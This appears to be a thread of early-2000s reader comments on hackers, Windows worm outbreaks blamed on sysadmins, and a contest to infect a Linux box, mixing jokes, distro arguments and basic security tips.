Imagine what computer security would be today if it didn't excist eny hackers*.
Then we might still be using ceasar encryption and run servers on WINDOWS!? boxes
These harmless hackers/crackers drives us to improve security, wich stops REAL criminals
*(these words have more than one meaning, is this case i mean 'people who crack codes and chipers' and 'poeple who break inte computers')
I think i stop here.
spaic - sweden
Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins.
In other breaking news, tardy sysadmins blame Microsoft for giving them a system which promotes laziness and poor coding standards. One such sysadmin was quoted as saying, "The install wizard didn't tell me that I had do configure anything. What button do I press to get the control panel?" When asked if he preferred emacs or vi, the same sysadmin responded, "Sure, I mean who DOESN'T like Big Macs."
Not only is this comment completely redundant... so too is the whole contest....
Any user who knows what he's doing can secure a system so that it's completely immune to virii. Close all ports so hackers can't get to you, and don't do anything stupid like openning attachments.
Even in Windows... Close all ports (easier than you might think). Use a program like Eudora, Pegasus, or Kaufman Mail Warrior that don't support scripting. Don't open any attachments. Don't download illicit software. Don't visit WAREZ sites. Don't take burns/diskettes from ANY other computer. Hey wow... you've just eliminated every way a virus can get into your system, and you're completely immune to virii. I could offer a billion dollars in Microshaft stock to the first person to infect me with a virus, and it wouldn't mean squat, because I know what I'm doing.
If you believe everything you read, you'd better not read. - Japanese proverb
i walk over to this guy's linux box with a q-tip.
I then wipe the q-tip on the inside of the box.
I then place the q-tip in a growth culture disk, cover it, and wait to mother nature at her finest to bring the big bucks to me.
so, where my 10k lbs? its polytics i tell ya, polytics...
eat your heart out little billy g.
i'd sure hate to be little billy g.'s dog right now...*grin*
Who said anything about Redhat?
Obviously you don't know what you're talking about, If you are concerned with security, you should be using slackware, or maybe debian.
"And we have seen and do testify that the Father sent the Son to be the Savior of the World"
1 John 4:14